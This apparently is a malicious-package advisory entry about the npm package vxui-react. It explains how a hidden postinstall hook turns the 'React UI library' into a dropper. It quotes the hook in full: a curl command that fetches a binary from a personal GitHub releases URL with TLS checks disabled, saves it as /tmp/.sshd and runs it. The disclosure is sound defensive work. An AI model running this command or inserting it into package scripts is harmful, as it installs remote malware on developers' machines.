---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (bde616ebc21909bfa386bf8e49438da710f48b62ae3127f2a7259c71557a4242)

package.json declares a postinstall script that runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &. On every npm install vxui-react, this fetches an opaque binary from a personal GitHub user (parikhpreyash4) unrelated to the package's publisher, with TLS verification explicitly disabled (-k), errors suppressed, the file staged to a hidden path masquerading as the SSH daemon (/tmp/.sshd), made executable, and launched detached in the background. The package advertises itself as a React UI component library; no legitimate purpose for this exists. The fetched URL is mutable (releases/latest), unsigned, and unverified. This is a classic install-time remote code execution dropper.